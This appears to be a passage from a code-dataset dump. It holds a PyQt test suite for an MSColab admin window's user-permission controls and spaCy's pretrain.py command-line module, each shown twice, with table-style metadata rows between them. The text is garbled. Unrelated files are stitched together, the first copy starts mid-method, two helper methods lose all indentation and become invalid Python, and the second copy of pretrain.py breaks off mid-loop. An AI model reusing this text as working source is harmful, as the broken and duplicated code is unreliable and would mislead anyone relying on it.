        QtTest.QTest.keyClicks(self.admin_window.addUsersSearch, "test2")
        QtWidgets.QApplication.processEvents()
        visible_row_count = self._get_visible_row_count(self.admin_window.addUsersTable)
        assert visible_row_count == 1
        self.admin_window.addUsersSearch.setText("")
        QtTest.QTest.keyClicks(self.admin_window.addUsersSearch, "")
        QtWidgets.QApplication.processEvents()
        visible_row_count = self._get_visible_row_count(self.admin_window.addUsersTable)
        assert visible_row_count == len_unadded_users
        # Text Search in modify users Table
        QtTest.QTest.keyClicks(self.admin_window.modifyUsersSearch, "test4")
        QtWidgets.QApplication.processEvents()
        visible_row_count = self._get_visible_row_count(self.admin_window.modifyUsersTable)
        assert visible_row_count == 1
        self.admin_window.modifyUsersSearch.setText("")
        QtTest.QTest.keyClicks(self.admin_window.modifyUsersSearch, "")
        QtWidgets.QApplication.processEvents()
        visible_row_count = self._get_visible_row_count(self.admin_window.modifyUsersTable)
        assert visible_row_count == len_added_users
    def test_permission_and_text_together(self):
        """Text search and permission filter combine (logical AND)."""
        QtTest.QTest.keyClicks(self.admin_window.modifyUsersSearch, "test4")
        self.admin_window.modifyUsersPermissionFilter.currentTextChanged.emit("viewer")
        QtWidgets.QApplication.processEvents()
        visible_row_count = self._get_visible_row_count(self.admin_window.modifyUsersTable)
        assert visible_row_count == 1
        # Same search text with a non-matching permission hides everything.
        self.admin_window.modifyUsersPermissionFilter.currentTextChanged.emit("admin")
        QtWidgets.QApplication.processEvents()
        visible_row_count = self._get_visible_row_count(self.admin_window.modifyUsersTable)
        assert visible_row_count == 0
    def test_add_permissions(self):
        """Adding users moves them from the add table to the modify table as admins."""
        len_unadded_users = self.admin_window.addUsersTable.rowCount()
        len_added_users = self.admin_window.modifyUsersTable.rowCount()
        users = ["test2", "test3"]
        # Select users in the add users table
        self._select_users(self.admin_window.addUsersTable, users)
        QtTest.QTest.mouseClick(self.admin_window.addUsersBtn, QtCore.Qt.LeftButton)
        QtWidgets.QApplication.processEvents()
        # Check if they have been added in the modify users table
        self._check_users_present(self.admin_window.modifyUsersTable, users, "admin")
        assert len_unadded_users - 2 == self.admin_window.addUsersTable.rowCount()
        assert len_added_users + 2 == self.admin_window.modifyUsersTable.rowCount()
    def test_modify_permissions(self):
        """Changing the access level of selected users is reflected in the table."""
        users = ["test2", "test3"]
        # Select users in the modify users table
        self._select_users(self.admin_window.modifyUsersTable, users)
        # Update their permission to viewer
        index = self.admin_window.modifyUsersPermission.findText("viewer", QtCore.Qt.MatchFixedString)
        self.admin_window.modifyUsersPermission.setCurrentIndex(index)
        QtTest.QTest.mouseClick(self.admin_window.modifyUsersBtn, QtCore.Qt.LeftButton)
        QtWidgets.QApplication.processEvents()
        # Check if the permission has been updated
        self._check_users_present(self.admin_window.modifyUsersTable, users, "viewer")
    def test_delete_permissions(self):
        """Deleting permissions moves users back from the modify-users table to the add-users table."""
        len_unadded_users = self.admin_window.addUsersTable.rowCount()
        len_added_users = self.admin_window.modifyUsersTable.rowCount()
        users = ["test2", "test3"]
        # Select users in the modify users table
        self._select_users(self.admin_window.modifyUsersTable, users)
        # Click on delete permissions
        QtTest.QTest.mouseClick(self.admin_window.deleteUsersBtn, QtCore.Qt.LeftButton)
        QtWidgets.QApplication.processEvents()
        # Check if the deleted users can be found in the add users table
        self._check_users_present(self.admin_window.addUsersTable, users)
        # Row counts shift back by exactly the two removed users
        assert len_unadded_users + 2 == self.admin_window.addUsersTable.rowCount()
        assert len_added_users - 2 == self.admin_window.modifyUsersTable.rowCount()
    def test_import_permissions(self):
        """Importing permissions from another project fills the modify-users table."""
        # Pick the source project named "three" in the import combo box
        index = self.admin_window.importPermissionsCB.findText("three", QtCore.Qt.MatchFixedString)
        self.admin_window.importPermissionsCB.setCurrentIndex(index)
        QtTest.QTest.mouseClick(self.admin_window.importPermissionsBtn, QtCore.Qt.LeftButton)
        QtWidgets.QApplication.processEvents()
        # Import happens asynchronously via the server; give it a moment to land
        time.sleep(1)
        # Expected row count after import -- presumably project "three" grants 5 users; verify against fixtures
        assert self.admin_window.modifyUsersTable.rowCount() == 5
    def _connect_to_mscolab(self):
        """Point the login widget at the local test server and connect."""
        # NOTE(review): hard-coded URL -- assumes the test server listens on port 8084
        self.window.url.setEditText("http://localhost:8084")
        QtTest.QTest.mouseClick(self.window.connectMscolab, QtCore.Qt.LeftButton)
        # Brief pause so the connection attempt can complete before the caller proceeds
        time.sleep(0.5)
    def _login(self):
        """Connect to the test server and log in with the 'test1' fixture account."""
        # login
        self._connect_to_mscolab()
        self.window.emailid.setText('test1')
        self.window.password.setText('test1')
        QtTest.QTest.mouseClick(self.window.loginButton, QtCore.Qt.LeftButton)
        QtWidgets.QApplication.processEvents()
    def _activate_project_at_index(self, index):
        """Select and open the project at *index* in the project list widget."""
        item = self.window.listProjects.item(index)
        point = self.window.listProjects.visualItemRect(item).center()
        # Single click selects the item ...
        QtTest.QTest.mouseClick(self.window.listProjects.viewport(), QtCore.Qt.LeftButton, pos=point)
        QtWidgets.QApplication.processEvents()
        # ... and a double click activates/opens the project
        QtTest.QTest.mouseDClick(self.window.listProjects.viewport(), QtCore.Qt.LeftButton, pos=point)
        QtWidgets.QApplication.processEvents()
    def _select_users(self, table, users):
        """Click every row of *table* whose username (column 0) is in *users*.

        Asserts that exactly two rows end up selected, so callers must pass
        exactly two usernames that exist in the table.
        """
        for row_num in range(table.rowCount()):
            item = table.item(row_num, 0)
            username = item.text()
            if username in users:
                # Click the centre of the item so Qt registers the row selection
                point = table.visualItemRect(item).center()
                QtTest.QTest.mouseClick(table.viewport(), QtCore.Qt.LeftButton, pos=point)
        QtWidgets.QApplication.processEvents()
        assert len(table.selectionModel().selectedRows()) == 2
def _get_visible_row_count(self, table):
visible_row_count = 0
for row_num in range(table.rowCount()):
if table.isRowHidden(row_num) is False:
visible_row_count += 1
return visible_row_count
def _check_users_present(self, table, users, access_level=None):
found = 0
for row_num in range(table.rowCount()):
item = table.item(row_num, 0)
username = item.text()
if username in users:
found += 1
if access_level is not None:
assert table.item(row_num, 2).text() == access_level
assert found == 2
| 47.552511 | 102 | 0.70482 |
import sys
import time
from mslib.msui.mscolab import MSSMscolabWindow
from mslib._tests.constants import MSCOLAB_URL_TEST
from mslib.mscolab.conf import mscolab_settings
from mslib.mscolab.server import APP, db, initialize_managers
from PyQt5 import QtCore, QtTest, QtWidgets
class Test_MscolabAdminWindow(object):
    """GUI tests for the MSColab admin window (user/permission management).

    Each test runs against a local MSColab test server with fixture accounts
    named "test1".."test4" -- confirm exact fixture data against the server
    setup if an assertion on row counts fails.
    """
    def setup(self):
        """Start the Qt app, log in as 'test1', open a project and its admin window."""
        self.app = APP
        self.app.config['SQLALCHEMY_DATABASE_URI'] = mscolab_settings.SQLALCHEMY_DB_URI
        self.app.config['MSCOLAB_DATA_DIR'] = mscolab_settings.MSCOLAB_DATA_DIR
        self.app, _, cm, fm = initialize_managers(self.app)
        self.fm = fm
        self.cm = cm
        db.init_app(self.app)
        self.application = QtWidgets.QApplication(sys.argv)
        self.window = MSSMscolabWindow(data_dir=mscolab_settings.MSCOLAB_DATA_DIR,
                                       mscolab_server_url=MSCOLAB_URL_TEST)
        self._login()
        self._activate_project_at_index(0)
        # Open the admin window for the activated project
        QtTest.QTest.mouseClick(self.window.adminWindowBtn, QtCore.Qt.LeftButton)
        QtWidgets.QApplication.processEvents()
        self.admin_window = self.window.admin_window
        QtTest.QTest.qWaitForWindowExposed(self.window)
        QtWidgets.QApplication.processEvents()
    def teardown(self):
        """Close windows, drop the server connection, and shut down the Qt app."""
        if self.window.admin_window:
            self.window.admin_window.close()
        if self.window.conn:
            self.window.conn.disconnect()
        self.window.close()
        QtWidgets.QApplication.processEvents()
        self.application.quit()
        QtWidgets.QApplication.processEvents()
    def test_permission_filter(self):
        """Permission filter hides rows whose access level doesn't match."""
        len_added_users = self.admin_window.modifyUsersTable.rowCount()
        # Only one fixture user has "viewer" access -- TODO confirm fixture data
        self.admin_window.modifyUsersPermissionFilter.currentTextChanged.emit("viewer")
        QtWidgets.QApplication.processEvents()
        visible_row_count = self._get_visible_row_count(self.admin_window.modifyUsersTable)
        assert visible_row_count == 1
        # "all" restores every row
        self.admin_window.modifyUsersPermissionFilter.currentTextChanged.emit("all")
        QtWidgets.QApplication.processEvents()
        visible_row_count = self._get_visible_row_count(self.admin_window.modifyUsersTable)
        assert visible_row_count == len_added_users
    def test_text_search_filter(self):
        """Typing in either search box filters its table; clearing restores all rows."""
        len_unadded_users = self.admin_window.addUsersTable.rowCount()
        len_added_users = self.admin_window.modifyUsersTable.rowCount()
        # Text search in the add-users table
        QtTest.QTest.keyClicks(self.admin_window.addUsersSearch, "test2")
        QtWidgets.QApplication.processEvents()
        visible_row_count = self._get_visible_row_count(self.admin_window.addUsersTable)
        assert visible_row_count == 1
        self.admin_window.addUsersSearch.setText("")
        QtTest.QTest.keyClicks(self.admin_window.addUsersSearch, "")
        QtWidgets.QApplication.processEvents()
        visible_row_count = self._get_visible_row_count(self.admin_window.addUsersTable)
        assert visible_row_count == len_unadded_users
        # Text search in the modify-users table
        QtTest.QTest.keyClicks(self.admin_window.modifyUsersSearch, "test4")
        QtWidgets.QApplication.processEvents()
        visible_row_count = self._get_visible_row_count(self.admin_window.modifyUsersTable)
        assert visible_row_count == 1
        self.admin_window.modifyUsersSearch.setText("")
        QtTest.QTest.keyClicks(self.admin_window.modifyUsersSearch, "")
        QtWidgets.QApplication.processEvents()
        visible_row_count = self._get_visible_row_count(self.admin_window.modifyUsersTable)
        assert visible_row_count == len_added_users
    def test_permission_and_text_together(self):
        """Text search and permission filter are applied jointly."""
        QtTest.QTest.keyClicks(self.admin_window.modifyUsersSearch, "test4")
        self.admin_window.modifyUsersPermissionFilter.currentTextChanged.emit("viewer")
        QtWidgets.QApplication.processEvents()
        visible_row_count = self._get_visible_row_count(self.admin_window.modifyUsersTable)
        assert visible_row_count == 1
        self.admin_window.modifyUsersPermissionFilter.currentTextChanged.emit("admin")
        QtWidgets.QApplication.processEvents()
        visible_row_count = self._get_visible_row_count(self.admin_window.modifyUsersTable)
        assert visible_row_count == 0
    def test_add_permissions(self):
        """Adding users moves them from the add-users to the modify-users table."""
        len_unadded_users = self.admin_window.addUsersTable.rowCount()
        len_added_users = self.admin_window.modifyUsersTable.rowCount()
        users = ["test2", "test3"]
        # Select users in the add-users table and click "add"
        self._select_users(self.admin_window.addUsersTable, users)
        QtTest.QTest.mouseClick(self.admin_window.addUsersBtn, QtCore.Qt.LeftButton)
        QtWidgets.QApplication.processEvents()
        # Newly added users appear with "admin" access -- confirm intended default
        self._check_users_present(self.admin_window.modifyUsersTable, users, "admin")
        assert len_unadded_users - 2 == self.admin_window.addUsersTable.rowCount()
        assert len_added_users + 2 == self.admin_window.modifyUsersTable.rowCount()
    def test_modify_permissions(self):
        """Updating the access level of selected users is reflected in the table."""
        users = ["test2", "test3"]
        # Select users and update their permission to viewer
        self._select_users(self.admin_window.modifyUsersTable, users)
        index = self.admin_window.modifyUsersPermission.findText("viewer", QtCore.Qt.MatchFixedString)
        self.admin_window.modifyUsersPermission.setCurrentIndex(index)
        QtTest.QTest.mouseClick(self.admin_window.modifyUsersBtn, QtCore.Qt.LeftButton)
        QtWidgets.QApplication.processEvents()
        self._check_users_present(self.admin_window.modifyUsersTable, users, "viewer")
    def test_delete_permissions(self):
        """Deleting permissions moves users back to the add-users table."""
        len_unadded_users = self.admin_window.addUsersTable.rowCount()
        len_added_users = self.admin_window.modifyUsersTable.rowCount()
        users = ["test2", "test3"]
        # Select users in the modify-users table and click "delete"
        self._select_users(self.admin_window.modifyUsersTable, users)
        QtTest.QTest.mouseClick(self.admin_window.deleteUsersBtn, QtCore.Qt.LeftButton)
        QtWidgets.QApplication.processEvents()
        # The deleted users must reappear in the add-users table
        self._check_users_present(self.admin_window.addUsersTable, users)
        assert len_unadded_users + 2 == self.admin_window.addUsersTable.rowCount()
        assert len_added_users - 2 == self.admin_window.modifyUsersTable.rowCount()
    def test_import_permissions(self):
        """Importing permissions from project "three" fills the modify-users table."""
        index = self.admin_window.importPermissionsCB.findText("three", QtCore.Qt.MatchFixedString)
        self.admin_window.importPermissionsCB.setCurrentIndex(index)
        QtTest.QTest.mouseClick(self.admin_window.importPermissionsBtn, QtCore.Qt.LeftButton)
        QtWidgets.QApplication.processEvents()
        # Import is asynchronous; give the server round-trip time to finish
        time.sleep(1)
        # Expected count presumably matches project "three" fixtures -- verify
        assert self.admin_window.modifyUsersTable.rowCount() == 5
    def _connect_to_mscolab(self):
        """Point the login widget at the local test server and connect."""
        self.window.url.setEditText("http://localhost:8084")
        QtTest.QTest.mouseClick(self.window.connectMscolab, QtCore.Qt.LeftButton)
        time.sleep(0.5)
    def _login(self):
        """Connect and log in with the 'test1' fixture account."""
        self._connect_to_mscolab()
        self.window.emailid.setText('test1')
        self.window.password.setText('test1')
        QtTest.QTest.mouseClick(self.window.loginButton, QtCore.Qt.LeftButton)
        QtWidgets.QApplication.processEvents()
    def _activate_project_at_index(self, index):
        """Select (click) and open (double-click) the project at *index*."""
        item = self.window.listProjects.item(index)
        point = self.window.listProjects.visualItemRect(item).center()
        QtTest.QTest.mouseClick(self.window.listProjects.viewport(), QtCore.Qt.LeftButton, pos=point)
        QtWidgets.QApplication.processEvents()
        QtTest.QTest.mouseDClick(self.window.listProjects.viewport(), QtCore.Qt.LeftButton, pos=point)
        QtWidgets.QApplication.processEvents()
    def _select_users(self, table, users):
        """Click every row whose username is in *users*; expects exactly two matches."""
        for row_num in range(table.rowCount()):
            item = table.item(row_num, 0)
            username = item.text()
            if username in users:
                point = table.visualItemRect(item).center()
                QtTest.QTest.mouseClick(table.viewport(), QtCore.Qt.LeftButton, pos=point)
        QtWidgets.QApplication.processEvents()
        assert len(table.selectionModel().selectedRows()) == 2
    def _get_visible_row_count(self, table):
        """Return how many rows of *table* are not hidden."""
        visible_row_count = 0
        for row_num in range(table.rowCount()):
            if table.isRowHidden(row_num) is False:
                visible_row_count += 1
        return visible_row_count
    def _check_users_present(self, table, users, access_level=None):
        """Assert exactly two of *users* are in *table*, optionally with *access_level*."""
        found = 0
        for row_num in range(table.rowCount()):
            item = table.item(row_num, 0)
            username = item.text()
            if username in users:
                found += 1
                if access_level is not None:
                    # Column 2 holds the access level
                    assert table.item(row_num, 2).text() == access_level
        assert found == 2
| true | true |
f7236f7de1a0f4da758da8b43c6cbb53ac940cb4 | 14,831 | py | Python | spacy/cli/pretrain.py | Ali-Tahir/spaCy | 9e210fa7fdb8e376655e7a7ab7debd3ffd718a63 | [
"MIT"
] | null | null | null | spacy/cli/pretrain.py | Ali-Tahir/spaCy | 9e210fa7fdb8e376655e7a7ab7debd3ffd718a63 | [
"MIT"
] | null | null | null | spacy/cli/pretrain.py | Ali-Tahir/spaCy | 9e210fa7fdb8e376655e7a7ab7debd3ffd718a63 | [
"MIT"
] | null | null | null | # coding: utf8
from __future__ import print_function, unicode_literals
import plac
import random
import numpy
import time
import re
from collections import Counter
from pathlib import Path
from thinc.v2v import Affine, Maxout
from thinc.misc import LayerNorm as LN
from thinc.neural.util import prefer_gpu
from wasabi import Printer
import srsly
from ..errors import Errors
from ..tokens import Doc
from ..attrs import ID, HEAD
from .._ml import Tok2Vec, flatten, chain, create_default_optimizer
from .._ml import masked_language_model, get_cossim_loss
from .. import util
from .train import _load_pretrained_tok2vec
@plac.annotations(
    texts_loc=(
        "Path to JSONL file with raw texts to learn from, with text provided as the key 'text' or tokens as the "
        "key 'tokens'",
        "positional",
        None,
        str,
    ),
    vectors_model=("Name or path to spaCy model with vectors to learn from"),
    output_dir=("Directory to write models to on each epoch", "positional", None, str),
    width=("Width of CNN layers", "option", "cw", int),
    depth=("Depth of CNN layers", "option", "cd", int),
    cnn_window=("Window size for CNN layers", "option", "cW", int),
    cnn_pieces=("Maxout size for CNN layers. 1 for Mish", "option", "cP", int),
    use_chars=("Whether to use character-based embedding", "flag", "chr", bool),
    sa_depth=("Depth of self-attention layers", "option", "sa", int),
    bilstm_depth=("Depth of BiLSTM layers (requires PyTorch)", "option", "lstm", int),
    embed_rows=("Number of embedding rows", "option", "er", int),
    loss_func=(
        "Loss function to use for the objective. Either 'L2' or 'cosine'",
        "option",
        "L",
        str,
    ),
    use_vectors=("Whether to use the static vectors as input features", "flag", "uv"),
    dropout=("Dropout rate", "option", "d", float),
    batch_size=("Number of words per training batch", "option", "bs", int),
    max_length=(
        "Max words per example. Longer examples are discarded",
        "option",
        "xw",
        int,
    ),
    min_length=(
        "Min words per example. Shorter examples are discarded",
        "option",
        "nw",
        int,
    ),
    seed=("Seed for random number generators", "option", "s", int),
    n_iter=("Number of iterations to pretrain", "option", "i", int),
    n_save_every=("Save model every X batches.", "option", "se", int),
    init_tok2vec=(
        "Path to pretrained weights for the token-to-vector parts of the models. See 'spacy pretrain'. Experimental.",
        "option",
        "t2v",
        Path,
    ),
    epoch_start=(
        "The epoch to start counting at. Only relevant when using '--init-tok2vec' and the given weight file has been "
        "renamed. Prevents unintended overwriting of existing weight files.",
        "option",
        "es",
        int,
    ),
)
def pretrain(
    texts_loc,
    vectors_model,
    output_dir,
    width=96,
    depth=4,
    bilstm_depth=0,
    cnn_pieces=3,
    sa_depth=0,
    use_chars=False,
    cnn_window=1,
    embed_rows=2000,
    loss_func="cosine",
    use_vectors=False,
    dropout=0.2,
    n_iter=1000,
    batch_size=3000,
    max_length=500,
    min_length=5,
    seed=0,
    n_save_every=None,
    init_tok2vec=None,
    epoch_start=None,
):
    """
    Pre-train the 'token-to-vector' (tok2vec) layer of pipeline components,
    using an approximate language-modelling objective. Specifically, we load
    pretrained vectors, and train a component like a CNN, BiLSTM, etc to predict
    vectors which match the pretrained ones. The weights are saved to a directory
    after each epoch. You can then pass a path to one of these pretrained weights
    files to the 'spacy train' command.
    This technique may be especially helpful if you have little labelled data.
    However, it's still quite experimental, so your mileage may vary.
    To load the weights back in during 'spacy train', you need to ensure
    all settings are the same between pretraining and training. The API and
    errors around this need some improvement.
    """
    # Snapshot the call arguments so the run can be reproduced from config.json.
    config = dict(locals())
    for key in config:
        if isinstance(config[key], Path):
            # JSON can't serialise Path objects; store plain strings instead.
            config[key] = str(config[key])
    msg = Printer()
    util.fix_random_seed(seed)
    has_gpu = prefer_gpu()
    if has_gpu:
        import torch
        torch.set_default_tensor_type("torch.cuda.FloatTensor")
    msg.info("Using GPU" if has_gpu else "Not using GPU")
    output_dir = Path(output_dir)
    if not output_dir.exists():
        output_dir.mkdir()
        msg.good("Created output directory")
    srsly.write_json(output_dir / "config.json", config)
    msg.good("Saved settings to config.json")
    # Load texts from file or stdin
    if texts_loc != "-":  # reading from a file
        texts_loc = Path(texts_loc)
        if not texts_loc.exists():
            msg.fail("Input text file doesn't exist", texts_loc, exits=1)
        with msg.loading("Loading input texts..."):
            texts = list(srsly.read_jsonl(texts_loc))
        if not texts:
            msg.fail("Input file is empty", texts_loc, exits=1)
        msg.good("Loaded input texts")
        random.shuffle(texts)
    else:  # reading from stdin
        msg.text("Reading input text from stdin...")
        texts = srsly.read_jsonl("-")
    with msg.loading("Loading model '{}'...".format(vectors_model)):
        nlp = util.load_model(vectors_model)
    msg.good("Loaded model '{}'".format(vectors_model))
    pretrained_vectors = None if not use_vectors else nlp.vocab.vectors.name
    model = create_pretraining_model(
        nlp,
        Tok2Vec(
            width,
            embed_rows,
            conv_depth=depth,
            pretrained_vectors=pretrained_vectors,
            bilstm_depth=bilstm_depth,  # Requires PyTorch. Experimental.
            subword_features=not use_chars,  # Set to False for Chinese etc
            cnn_maxout_pieces=cnn_pieces,  # If set to 1, use Mish activation.
        ),
    )
    # Load in pretrained weights
    if init_tok2vec is not None:
        components = _load_pretrained_tok2vec(nlp, init_tok2vec)
        msg.text("Loaded pretrained tok2vec for: {}".format(components))
        # Parse the epoch number from the given weight file
        model_name = re.search(r"model\d+\.bin", str(init_tok2vec))
        if model_name:
            # Default weight file name so read epoch_start from it by cutting off 'model' and '.bin'
            epoch_start = int(model_name.group(0)[5:][:-4]) + 1
        else:
            if not epoch_start:
                msg.fail(
                    "You have to use the '--epoch-start' argument when using a renamed weight file for "
                    "'--init-tok2vec'",
                    exits=True,
                )
            elif epoch_start < 0:
                msg.fail(
                    "The argument '--epoch-start' has to be greater or equal to 0. '%d' is invalid"
                    % epoch_start,
                    exits=True,
                )
    else:
        # Without '--init-tok2vec' the '--epoch-start' argument is ignored
        epoch_start = 0
    optimizer = create_default_optimizer(model.ops)
    tracker = ProgressTracker(frequency=10000)
    msg.divider("Pre-training tok2vec layer - starting at epoch %d" % epoch_start)
    row_settings = {"widths": (3, 10, 10, 6, 4), "aligns": ("r", "r", "r", "r", "r")}
    msg.row(("#", "# Words", "Total Loss", "Loss", "w/s"), **row_settings)
    def _save_model(epoch, is_temp=False):
        # Write the tok2vec weights (averaged parameters) plus a log line.
        is_temp_str = ".temp" if is_temp else ""
        with model.use_params(optimizer.averages):
            with (output_dir / ("model%d%s.bin" % (epoch, is_temp_str))).open(
                "wb"
            ) as file_:
                file_.write(model.tok2vec.to_bytes())
            log = {
                "nr_word": tracker.nr_word,
                "loss": tracker.loss,
                "epoch_loss": tracker.epoch_loss,
                "epoch": epoch,
            }
            with (output_dir / "log.jsonl").open("a") as file_:
                file_.write(srsly.json_dumps(log) + "\n")
    skip_counter = 0
    for epoch in range(epoch_start, n_iter + epoch_start):
        for batch_id, batch in enumerate(
            util.minibatch_by_words(((text, None) for text in texts), size=batch_size)
        ):
            docs, count = make_docs(
                nlp,
                [text for (text, _) in batch],
                max_length=max_length,
                min_length=min_length,
            )
            skip_counter += count
            loss = make_update(
                model, docs, optimizer, objective=loss_func, drop=dropout
            )
            progress = tracker.update(epoch, loss, docs)
            if progress:
                msg.row(progress, **row_settings)
                # When streaming from stdin, cap an "epoch" at 10M words
                if texts_loc == "-" and tracker.words_per_epoch[epoch] >= 10 ** 7:
                    break
            if n_save_every and (batch_id % n_save_every == 0):
                _save_model(epoch, is_temp=True)
        _save_model(epoch)
        tracker.epoch_loss = 0.0
        if texts_loc != "-":
            # Reshuffle the texts if texts were loaded from a file
            random.shuffle(texts)
    if skip_counter > 0:
        msg.warn("Skipped {count} empty values".format(count=str(skip_counter)))
    msg.good("Successfully finished pretrain")
def make_update(model, docs, optimizer, drop=0.0, objective="L2"):
    """Run one forward/backward pass over a single batch of documents.

    docs (iterable): A batch of `Doc` objects.
    drop (float): The dropout rate.
    optimizer (callable): An optimizer.
    RETURNS loss: A float for the loss.
    """
    output, finish_update = model.begin_update(docs, drop=drop)
    loss, d_output = get_vectors_loss(model.ops, docs, output, objective)
    finish_update(d_output, sgd=optimizer)
    # Cast so callers never receive a cupy scalar. The gradients are
    # modified in-place by the BERT-style MLM, so the loss is accurate.
    return float(loss)
def make_docs(nlp, batch, min_length, max_length):
    """Convert raw JSONL records into `Doc` objects.

    Records carry either pre-tokenized words under "tokens" or raw text under
    "text"; optional "heads" annotations are attached when present.  Records
    with empty text/tokens are skipped and counted.

    RETURNS (docs, skip_count): The docs whose length is within
        [min_length, max_length), plus the number of empty records dropped.
    """
    docs = []
    n_skipped = 0
    for record in batch:
        if not isinstance(record, dict):
            raise TypeError(Errors.E137.format(type=type(record), line=record))
        if "tokens" in record:
            words = record["tokens"]
            if not words:
                n_skipped += 1
                continue
            doc = Doc(nlp.vocab, words=words)
        elif "text" in record:
            text = record["text"]
            if not text:
                n_skipped += 1
                continue
            doc = nlp.make_doc(text)
        else:
            raise ValueError(Errors.E138.format(text=record))
        if "heads" in record:
            # Attach dependency heads as a (n_tokens, 1) uint64 column.
            heads = numpy.asarray(record["heads"], dtype="uint64")
            doc = doc.from_array([HEAD], heads.reshape((len(doc), 1)))
        if min_length <= len(doc) < max_length:
            docs.append(doc)
    return docs, n_skipped
def get_vectors_loss(ops, docs, prediction, objective="L2"):
    """Compute the loss (and its gradient) between the documents' pretrained
    vectors and the model's prediction.

    Note that this is ripe for customization! We could compute the vectors
    in some other way, e.g. with an LSTM language model, or use some other
    type of objective.
    """
    # Rather than vstacking token.vector (which copies, especially on GPU),
    # gather the vocab-vector row id for every token and index the table once.
    ids = ops.flatten([doc.to_array(ID).ravel() for doc in docs])
    target = docs[0].vocab.vectors.data[ids]
    if objective == "L2":
        d_target = prediction - target
        return (d_target ** 2).sum(), d_target
    if objective == "cosine":
        return get_cossim_loss(prediction, target)
    raise ValueError(Errors.E142.format(loss_func=objective))
def create_pretraining_model(nlp, tok2vec):
    """Define a network for the pretraining. We simply add an output layer onto
    the tok2vec input model. The tok2vec input model needs to be a model that
    takes a batch of Doc objects (as a list), and returns a list of arrays.
    Each array in the output needs to have one row per token in the doc.
    """
    # Output width matches the pretrained vector table we are predicting.
    output_size = nlp.vocab.vectors.data.shape[1]
    output_layer = chain(
        LN(Maxout(300, pieces=3)), Affine(output_size, drop_factor=0.0)
    )
    # This is annoying, but the parser etc have the flatten step after
    # the tok2vec. To load the weights in cleanly, we need to match
    # the shape of the models' components exactly. So what we call
    # "tok2vec" has to be the same set of processes as what the components do.
    tok2vec = chain(tok2vec, flatten)
    model = chain(tok2vec, output_layer)
    # Wrap with the masked-language-model objective (see _ml.masked_language_model).
    model = masked_language_model(nlp.vocab, model)
    model.tok2vec = tok2vec
    model.output_layer = output_layer
    # Run one dummy doc through so layer shapes get inferred/initialised.
    model.begin_training([nlp.make_doc("Give it a doc to infer shapes")])
    return model
class ProgressTracker(object):
    """Accumulate word/loss totals and emit a status row every `frequency` words."""

    def __init__(self, frequency=1000000):
        self.loss = 0.0
        self.prev_loss = 0.0
        self.nr_word = 0
        self.words_per_epoch = Counter()
        self.frequency = frequency
        self.last_time = time.time()
        self.last_update = 0
        self.epoch_loss = 0.0

    def update(self, epoch, loss, docs):
        """Record one batch; return a status tuple when it is time to log, else None."""
        self.loss += loss
        self.epoch_loss += loss
        batch_words = sum(len(doc) for doc in docs)
        self.words_per_epoch[epoch] += batch_words
        self.nr_word += batch_words
        unseen = self.nr_word - self.last_update
        if unseen < self.frequency:
            return None
        # Time to emit a row: compute words/sec since the last emission.
        wps = unseen / (time.time() - self.last_time)
        self.last_update = self.nr_word
        self.last_time = time.time()
        loss_since_last = self.loss - self.prev_loss
        status = (
            epoch,
            self.nr_word,
            _smart_round(self.loss, width=10),
            _smart_round(loss_since_last, width=6),
            int(wps),
        )
        self.prev_loss = float(self.loss)
        return status
def _smart_round(figure, width=10, max_decimal=4):
"""Round large numbers as integers, smaller numbers as decimals."""
n_digits = len(str(int(figure)))
n_decimal = width - (n_digits + 1)
if n_decimal <= 1:
return str(int(figure))
else:
n_decimal = min(n_decimal, max_decimal)
format_str = "%." + str(n_decimal) + "f"
return format_str % figure
| 37.737913 | 119 | 0.617221 |
from __future__ import print_function, unicode_literals
import plac
import random
import numpy
import time
import re
from collections import Counter
from pathlib import Path
from thinc.v2v import Affine, Maxout
from thinc.misc import LayerNorm as LN
from thinc.neural.util import prefer_gpu
from wasabi import Printer
import srsly
from ..errors import Errors
from ..tokens import Doc
from ..attrs import ID, HEAD
from .._ml import Tok2Vec, flatten, chain, create_default_optimizer
from .._ml import masked_language_model, get_cossim_loss
from .. import util
from .train import _load_pretrained_tok2vec
@plac.annotations(
    texts_loc=(
        "Path to JSONL file with raw texts to learn from, with text provided as the key 'text' or tokens as the "
        "key 'tokens'",
        "positional",
        None,
        str,
    ),
    vectors_model=("Name or path to spaCy model with vectors to learn from"),
    output_dir=("Directory to write models to on each epoch", "positional", None, str),
    width=("Width of CNN layers", "option", "cw", int),
    depth=("Depth of CNN layers", "option", "cd", int),
    cnn_window=("Window size for CNN layers", "option", "cW", int),
    cnn_pieces=("Maxout size for CNN layers. 1 for Mish", "option", "cP", int),
    use_chars=("Whether to use character-based embedding", "flag", "chr", bool),
    sa_depth=("Depth of self-attention layers", "option", "sa", int),
    bilstm_depth=("Depth of BiLSTM layers (requires PyTorch)", "option", "lstm", int),
    embed_rows=("Number of embedding rows", "option", "er", int),
    loss_func=(
        "Loss function to use for the objective. Either 'L2' or 'cosine'",
        "option",
        "L",
        str,
    ),
    use_vectors=("Whether to use the static vectors as input features", "flag", "uv"),
    dropout=("Dropout rate", "option", "d", float),
    batch_size=("Number of words per training batch", "option", "bs", int),
    max_length=(
        "Max words per example. Longer examples are discarded",
        "option",
        "xw",
        int,
    ),
    min_length=(
        "Min words per example. Shorter examples are discarded",
        "option",
        "nw",
        int,
    ),
    seed=("Seed for random number generators", "option", "s", int),
    n_iter=("Number of iterations to pretrain", "option", "i", int),
    n_save_every=("Save model every X batches.", "option", "se", int),
    init_tok2vec=(
        "Path to pretrained weights for the token-to-vector parts of the models. See 'spacy pretrain'. Experimental.",
        "option",
        "t2v",
        Path,
    ),
    epoch_start=(
        "The epoch to start counting at. Only relevant when using '--init-tok2vec' and the given weight file has been "
        "renamed. Prevents unintended overwriting of existing weight files.",
        "option",
        "es",
        int,
    ),
)
def pretrain(
    texts_loc,
    vectors_model,
    output_dir,
    width=96,
    depth=4,
    bilstm_depth=0,
    cnn_pieces=3,
    sa_depth=0,
    use_chars=False,
    cnn_window=1,
    embed_rows=2000,
    loss_func="cosine",
    use_vectors=False,
    dropout=0.2,
    n_iter=1000,
    batch_size=3000,
    max_length=500,
    min_length=5,
    seed=0,
    n_save_every=None,
    init_tok2vec=None,
    epoch_start=None,
):
    """Pre-train the 'token-to-vector' (tok2vec) layer of pipeline components
    with an approximate language-modelling objective: train a CNN/BiLSTM to
    predict the pretrained vectors of each token. Weights are saved to
    *output_dir* after each epoch and can be passed to 'spacy train' via
    '--init-tok2vec' (all settings must then match between the two runs).
    """
    # Snapshot the call arguments so the run can be reproduced from config.json.
    config = dict(locals())
    for key in config:
        if isinstance(config[key], Path):
